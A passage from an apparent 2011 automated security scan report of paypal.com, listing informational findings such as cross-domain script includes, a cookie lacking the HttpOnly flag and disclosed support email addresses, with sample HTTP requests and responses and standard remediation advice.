https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

Response

8.17. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /us/cgi-bin/helpscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:16 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:17 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.18. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /us/cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.19. https://www.paypal.com/us/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.20. https://www.paypal.com/us/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /us/cgi-bin/helpweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:12 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:13 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.21. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /us/cgi-bin/marketingweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:21 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:22 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.22. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.23. https://www.paypal.com/us/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/searchscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /us/cgi-bin/searchscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:18 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:19 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.24. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.25. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

Response

8.26. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/Merchant/js/flowGettingStarted.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/onlineOpinionPopup.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.27. https://www.paypal.com/us/ewf/f=pps_spf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/ewf/f=pps_spf

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /us/ewf/f=pps_spf HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:30 GMT
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache
Set-Cookie: navcmd=_external-webform; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:32 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2017%20_external-webform%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2019%20Contact%20Us%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.28. https://www.paypal.com/us/ewf/f=sa_unauth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/ewf/f=sa_unauth

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /us/ewf/f=sa_unauth HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:30 GMT
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache
Set-Cookie: navcmd=_external-webform; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:31 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2017%20_external-webform%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2019%20Contact%20Us%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.29. https://www.paypal.com/webapps/mpp/merchant previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/webapps/mpp/merchant

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_1_da_DK.js
https://www.paypalobjects.com/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_2_da_DK.js
https://www.paypalobjects.com/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_3_da_DK.js
https://www.paypalobjects.com/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_4_da_DK.js
https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:48:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: must-revalidate
Cache-Control: proxy-revalidate
Cache-Control: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
flag_logged_in: false
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: analytics=BmwsFRW4RPCsHHa32nsJIamY3eloEl9iEChKbWJ9JKvYfpr4mu.5hFItKoThr0S4FRq97sCZUDUoH8Z7z-ptX1d6RZ4lypbKpRthHlJjHmR19bvXGkBDcbkRqbpwz8Ei; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:04:00 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 23601

<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="keywords" content="merchant services, merchant account services, business account "><meta name="description" content="From acc
...[SNIP]...
<body id="body"><script type="text/javascript" src="https://www.paypalobjects.com:443/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_1_da_DK.js"></script><script type="text/javascript" src="https://www.paypalobjects.com:443/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_2_da_DK.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com:443/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_3_da_DK.js"></script><script type="text/javascript" src="https://www.paypalobjects.com:443/eboxapps/MarketingPublishingPlatformApp/js/da_DK/780/MPPContentAppSpec_CoreFourPaneViewSpec_7801_4_da_DK.js"></script>
...[SNIP]...

8.30. https://www.paypal.com/webapps/mpp/website-payments-pro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/webapps/mpp/website-payments-pro

Issue detail

The response dynamically includes the following script from another domain:

https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js

Request

Response

9. Cookie without HttpOnly flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=10.190.9.182.1313112145907951; path=/; expires=Sun, 04-Aug-41 01:22:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

Response

10. Email addresses disclosed previous next
There are 2 instances of this issue:

/helpcenter/main.jsp
/us/cgi-bin/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

10.1. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The following email addresses were disclosed in the response:

20payflow-support@paypal.com
gateway-ausupport@paypal.com
payflow-support@paypal.com
payflowsales@paypal.com

Request

GET /helpcenter/main.jsp?t=searchTab&dosearch=true&locale=en_US&_dyncharset=UTF-8&countrycode=US&cmd=_help&searchstring=Merchant&m=BT HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:32 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:48:34 GMT; domain=paypal.com; path=/; Secure; HttpOnly
